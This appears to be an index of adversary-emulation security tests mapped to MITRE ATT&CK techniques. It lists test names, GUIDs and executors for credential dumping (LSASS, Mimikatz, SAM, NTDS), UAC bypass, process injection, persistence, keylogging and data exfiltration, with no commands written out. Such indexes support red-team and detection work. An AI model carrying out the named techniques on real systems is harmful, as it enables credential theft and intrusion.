command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 credential-access T1003.008 /etc/passwd and /etc/shadow 1 Access /etc/shadow (Local) 3723ab77-c546-403c-8fb4-bb577033b235 bash
3 credential-access T1003.008 /etc/passwd and /etc/shadow 2 Access /etc/passwd (Local) 60e860b6-8ae6-49db-ad07-5e73edd88f5d sh
4 credential-access T1552.003 Bash History 1 Search Through Bash History 3cfde62b-7c33-4b26-a61e-755d6131c8ce sh
5 credential-access T1552.007 Container API 1 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
6 credential-access T1552.007 Container API 2 Cat the contents of a Kubernetes service account token file 788e0019-a483-45da-bcfe-96353d46820f sh
7 credential-access T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
8 credential-access T1110.004 Credential Stuffing 1 SSH Credential Stuffing From Linux 4f08197a-2a8a-472d-9589-cd2895ef22ad bash
9 credential-access T1110.004 Credential Stuffing 2 SSH Credential Stuffing From MacOS d546a3d9-0be5-40c7-ad82-5a7d79e1b66b bash
10 credential-access T1552.001 Credentials In Files 1 Extract Browser and System credentials with LaZagne 9e507bb8-1d30-4e3b-a49b-cb5727d7ea79 bash
11 credential-access T1552.001 Credentials In Files 2 Extract passwords with grep bd4cf0d1-7646-474e-8610-78ccf5a097c4 sh
12 credential-access T1552.001 Credentials In Files 3 Extracting passwords with findstr 0e56bf29-ff49-4ea5-9af4-3b81283fd513 powershell
13 credential-access T1552.001 Credentials In Files 4 Access unattend.xml 367d4004-5fc0-446d-823f-960c74ae52c3 command_prompt
14 credential-access T1552.001 Credentials In Files 5 Find and Access Github Credentials da4f751a-020b-40d7-b9ff-d433b7799803 bash
15 credential-access T1555 Credentials from Password Stores 1 Extract Windows Credential Manager via VBA 234f9b7c-b53d-4f32-897b-b880a6c9ea7b powershell
16 credential-access T1555 Credentials from Password Stores 2 Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] c89becbe-1758-4e7d-a0f4-97d2188a23e3 powershell
17 credential-access T1555 Credentials from Password Stores 3 Dump credentials from Windows Credential Manager With PowerShell [web Credentials] 8fd5a296-6772-4766-9991-ff4e92af7240 powershell
18 credential-access T1555.003 Credentials from Web Browsers 1 Run Chrome-password Collector 8c05b133-d438-47ca-a630-19cc464c4622 powershell
19 credential-access T1555.003 Credentials from Web Browsers 2 Search macOS Safari Cookies c1402f7b-67ca-43a8-b5f3-3143abedc01b sh
20 credential-access T1555.003 Credentials from Web Browsers 3 LaZagne - Credentials from Browser 9a2915b3-3954-4cce-8c76-00fbf4dbd014 command_prompt
21 credential-access T1552.002 Credentials in Registry 1 Enumeration for Credentials in Registry b6ec082c-7384-46b3-a111-9a9b8b14e5e7 command_prompt
22 credential-access T1552.002 Credentials in Registry 2 Enumeration for PuTTY Credentials in Registry af197fd7-e868-448e-9bd5-05d1bcd9d9e5 command_prompt
23 credential-access T1003.006 DCSync 1 DCSync (Active Directory) 129efd28-8497-4c87-a1b0-73b9a870ca3e command_prompt
24 credential-access T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
25 credential-access T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
26 credential-access T1558.001 Golden Ticket 1 Crafting Active Directory golden tickets with mimikatz 9726592a-dabc-4d4d-81cd-44070008b3af powershell
27 credential-access T1552.006 Group Policy Preferences 1 GPP Passwords (findstr) 870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f command_prompt
28 credential-access T1552.006 Group Policy Preferences 2 GPP Passwords (Get-GPPPassword) e9584f82-322c-474a-b831-940fd8b4455c powershell
29 credential-access T1558.003 Kerberoasting 1 Request for service tickets 3f987809-3681-43c8-bcd8-b3ff3a28533a powershell
30 credential-access T1555.001 Keychain 1 Keychain 1864fdec-ff86-4452-8c30-f12507582a93 sh
31 credential-access T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
32 credential-access T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
33 credential-access T1003.004 LSA Secrets 1 Dumping LSA Secrets 55295ab0-a703-433b-9ca4-ae13807de12f command_prompt
34 credential-access T1003.001 LSASS Memory 1 Windows Credential Editor 0f7c5301-6859-45ba-8b4d-1fac30fc31ed command_prompt
35 credential-access T1003.001 LSASS Memory 2 Dump LSASS.exe Memory using ProcDump 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 command_prompt
36 credential-access T1003.001 LSASS Memory 3 Dump LSASS.exe Memory using comsvcs.dll 2536dee2-12fb-459a-8c37-971844fa73be powershell
37 credential-access T1003.001 LSASS Memory 4 Dump LSASS.exe Memory using direct system calls and API unhooking 7ae7102c-a099-45c8-b985-4c7a2d05790d command_prompt
38 credential-access T1003.001 LSASS Memory 5 Dump LSASS.exe Memory using Windows Task Manager dea6c349-f1c6-44f3-87a1-1ed33a59a607 manual
39 credential-access T1003.001 LSASS Memory 6 Offline Credential Theft With Mimikatz 453acf13-1dbd-47d7-b28a-172ce9228023 command_prompt
40 credential-access T1003.001 LSASS Memory 7 LSASS read with pypykatz c37bc535-5c62-4195-9cc3-0517673171d8 command_prompt
41 credential-access T1003.001 LSASS Memory 8 Dump LSASS.exe Memory using Out-Minidump.ps1 6502c8f0-b775-4dbd-9193-1298f56b6781 powershell
42 credential-access T1003.001 LSASS Memory 9 Create Mini Dump of LSASS.exe using ProcDump 7cede33f-0acd-44ef-9774-15511300b24b command_prompt
43 credential-access T1003.001 LSASS Memory 10 Powershell Mimikatz 66fb0bc1-3c3f-47e9-a298-550ecfefacbc powershell
44 credential-access T1003.001 LSASS Memory 11 Dump LSASS with .Net 5 createdump.exe 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 powershell
45 credential-access T1003.001 LSASS Memory 12 Dump LSASS.exe using imported Microsoft DLLs 86fc3f40-237f-4701-b155-81c01c48d697 powershell
46 credential-access T1003.003 NTDS 1 Create Volume Shadow Copy with vssadmin dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f command_prompt
47 credential-access T1003.003 NTDS 2 Copy NTDS.dit from Volume Shadow Copy c6237146-9ea6-4711-85c9-c56d263a6b03 command_prompt
48 credential-access T1003.003 NTDS 3 Dump Active Directory Database with NTDSUtil 2364e33d-ceab-4641-8468-bfb1d7cc2723 command_prompt
49 credential-access T1003.003 NTDS 4 Create Volume Shadow Copy with WMI 224f7de0-8f0a-4a94-b5d8-989b036c86da command_prompt
50 credential-access T1003.003 NTDS 5 Create Volume Shadow Copy with Powershell 542bb97e-da53-436b-8e43-e0a7d31a6c24 powershell
51 credential-access T1003.003 NTDS 6 Create Symlink to Volume Shadow Copy 21748c28-2793-4284-9e07-d6d028b66702 command_prompt
52 credential-access T1040 Network Sniffing 1 Packet Capture Linux 7fe741f7-b265-4951-a7c7-320889083b3e bash
53 credential-access T1040 Network Sniffing 2 Packet Capture macOS 9d04efee-eff5-4240-b8d2-07792b873608 bash
54 credential-access T1040 Network Sniffing 3 Packet Capture Windows Command Prompt a5b2f6a0-24b4-493e-9590-c699f75723ca command_prompt
55 credential-access T1040 Network Sniffing 4 Windows Internal Packet Capture b5656f67-d67f-4de8-8e62-b5581630f528 command_prompt
56 credential-access T1003 OS Credential Dumping 1 Gsecdump 96345bfc-8ae7-4b6a-80b7-223200f24ef9 command_prompt
57 credential-access T1003 OS Credential Dumping 2 Credential Dumping with NPPSpy 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 powershell
58 credential-access T1003 OS Credential Dumping 3 Dump svchost.exe to gather RDP credentials d400090a-d8ca-4be0-982e-c70598a23de9 powershell
59 credential-access T1110.002 Password Cracking 1 Password Cracking with Hashcat 6d27df5d-69d4-4c91-bc33-5983ffe91692 command_prompt
60 credential-access T1556.002 Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
61 credential-access T1110.001 Password Guessing 1 Brute Force Credentials of all Active Directory domain users via SMB 09480053-2f98-4854-be6e-71ae5f672224 command_prompt
62 credential-access T1110.001 Password Guessing 2 Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) c2969434-672b-4ec8-8df0-bbb91f40e250 powershell
63 credential-access T1110.001 Password Guessing 3 Brute Force Credentials of single Azure AD user 5a51ef57-299e-4d62-8e11-2d440df55e69 powershell
64 credential-access T1110.003 Password Spraying 1 Password Spray all Domain Users 90bc2e54-6c84-47a5-9439-0a2a92b4b175 command_prompt
65 credential-access T1110.003 Password Spraying 2 Password Spray (DomainPasswordSpray) 263ae743-515f-4786-ac7d-41ef3a0d4b2b powershell
66 credential-access T1110.003 Password Spraying 3 Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) f14d956a-5b6e-4a93-847f-0c415142f07d powershell
67 credential-access T1110.003 Password Spraying 4 Password spray all Azure AD users with a single password a8aa2d3e-1c52-4016-bc73-0f8854cfa80a powershell
68 credential-access T1552.004 Private Keys 1 Private Keys 520ce462-7ca7-441e-b5a5-f8347f632696 command_prompt
69 credential-access T1552.004 Private Keys 2 Discover Private SSH Keys 46959285-906d-40fa-9437-5a439accd878 sh
70 credential-access T1552.004 Private Keys 3 Copy Private SSH Keys with CP 7c247dc7-5128-4643-907b-73a76d9135c3 sh
71 credential-access T1552.004 Private Keys 4 Copy Private SSH Keys with rsync 864bb0b2-6bb5-489a-b43b-a77b3a16d68a sh
72 credential-access T1003.007 Proc Filesystem 1 Dump individual process memory with sh (Local) 7e91138a-8e74-456d-a007-973d67a0bb80 sh
73 credential-access T1003.007 Proc Filesystem 2 Dump individual process memory with Python (Local) 437b2003-a20d-4ed8-834c-4964f24eec63 sh
74 credential-access T1003.002 Security Account Manager 1 Registry dump of SAM, creds, and secrets 5c2571d0-1572-416d-9676-812e64ca9f44 command_prompt
75 credential-access T1003.002 Security Account Manager 2 Registry parse with pypykatz a96872b2-cbf3-46cf-8eb4-27e8c0e85263 command_prompt
76 credential-access T1003.002 Security Account Manager 3 esentutl.exe SAM copy a90c2f4d-6726-444e-99d2-a00cd7c20480 command_prompt
77 credential-access T1003.002 Security Account Manager 4 PowerDump Registry dump of SAM for hashes and usernames 804f28fc-68fc-40da-b5a2-e9d0bce5c193 powershell
78 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
79 collection T1560.002 Archive via Library 1 Compressing data using GZip in Python (Linux) 391f5298-b12d-4636-8482-35d9c17d53a8 bash
80 collection T1560.002 Archive via Library 2 Compressing data using bz2 in Python (Linux) c75612b2-9de0-4d7c-879c-10d7b077072d bash
81 collection T1560.002 Archive via Library 3 Compressing data using zipfile in Python (Linux) 001a042b-859f-44d9-bf81-fd1c4e2200b0 bash
82 collection T1560.002 Archive via Library 4 Compressing data using tarfile in Python (Linux) e86f1b4b-fcc1-4a2a-ae10-b49da01458db bash
83 collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
84 collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
85 collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
86 collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
87 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
88 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
89 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
90 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
91 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
92 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
93 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
94 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
95 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
96 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
97 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
98 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
99 collection T1115 Clipboard Data 4 Collect Clipboard Data via VBA 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 powershell
100 collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
101 collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
102 collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
103 collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
104 collection T1056.001 Keylogging 2 Living off the land Terminal Input Capture on Linux with pam.d 9c6bdb34-a89f-4b90-acb1-5970614c711b sh
105 collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
106 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
107 collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
108 collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
109 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
110 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
111 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
112 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
113 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
114 privilege-escalation T1546.008 Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
115 privilege-escalation T1546.008 Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
116 privilege-escalation T1546.010 AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
117 privilege-escalation T1546.011 Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
118 privilege-escalation T1546.011 Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
119 privilege-escalation T1546.011 Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
120 privilege-escalation T1055.004 Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
121 privilege-escalation T1053.001 At (Linux) 1 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
122 privilege-escalation T1053.002 At (Windows) 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
123 privilege-escalation T1548.002 Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
124 privilege-escalation T1548.002 Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
125 privilege-escalation T1548.002 Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
126 privilege-escalation T1548.002 Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
127 privilege-escalation T1548.002 Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
128 privilege-escalation T1548.002 Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
129 privilege-escalation T1548.002 Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
130 privilege-escalation T1548.002 Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
131 privilege-escalation T1548.002 Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
132 privilege-escalation T1574.012 COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
133 privilege-escalation T1574.012 COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
134 privilege-escalation T1574.012 COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
135 privilege-escalation T1546.001 Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
136 privilege-escalation T1053.007 Container Orchestration Job 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
137 privilege-escalation T1053.007 Container Orchestration Job 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
138 privilege-escalation T1053.003 Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
139 privilege-escalation T1053.003 Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
140 privilege-escalation T1053.003 Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
141 privilege-escalation T1574.001 DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
142 privilege-escalation T1574.002 DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
143 privilege-escalation T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin priviliges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
144 privilege-escalation T1574.006 Dynamic Linker Hijacking 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
145 privilege-escalation T1574.006 Dynamic Linker Hijacking 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
146 privilege-escalation T1055.001 Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
147 privilege-escalation T1546.014 Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
148 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
149 privilege-escalation T1546.012 Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
150 privilege-escalation T1546.012 Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
151 privilege-escalation T1547.006 Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
152 privilege-escalation T1543.001 Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
153 privilege-escalation T1543.004 Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
154 privilege-escalation T1053.004 Launchd 1 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
155 privilege-escalation T1078.003 Local Accounts 1 Create local account with admin priviliges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
156 privilege-escalation T1037.002 Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
157 privilege-escalation T1037.001 Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
158 privilege-escalation T1546.007 Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
159 privilege-escalation T1134.004 Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
160 privilege-escalation T1134.004 Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
161 privilege-escalation T1134.004 Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
162 privilege-escalation T1134.004 Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
163 privilege-escalation T1134.004 Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
164 privilege-escalation T1574.009 Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
165 privilege-escalation T1547.011 Plist Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
166 privilege-escalation T1547.010 Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
167 privilege-escalation T1546.013 PowerShell Profile 1 Append malicious start-process cmdlet 090e5aa5-32b6-473b-a49b-21e843a56896 powershell
168 privilege-escalation T1055.012 Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
169 privilege-escalation T1055.012 Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
170 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
171 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
172 privilege-escalation T1037.004 RC Scripts 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
173 privilege-escalation T1037.004 RC Scripts 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
174 privilege-escalation T1037.004 RC Scripts 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
175 privilege-escalation T1547.007 Re-opened Applications 1 Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba manual
176 privilege-escalation T1547.007 Re-opened Applications 2 Re-Opened Applications 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
177 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
178 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
179 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
180 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
181 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
182 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
183 privilege-escalation T1547.001 Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
184 privilege-escalation T1053.005 Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
185 privilege-escalation T1053.005 Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
186 privilege-escalation T1053.005 Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
187 privilege-escalation T1053.005 Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
188 privilege-escalation T1053.005 Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
189 privilege-escalation T1053.005 Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
190 privilege-escalation T1546.002 Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
191 privilege-escalation T1547.005 Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
192 privilege-escalation T1574.011 Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
193 privilege-escalation T1574.011 Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
194 privilege-escalation T1548.001 Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
195 privilege-escalation T1548.001 Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
196 privilege-escalation T1548.001 Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
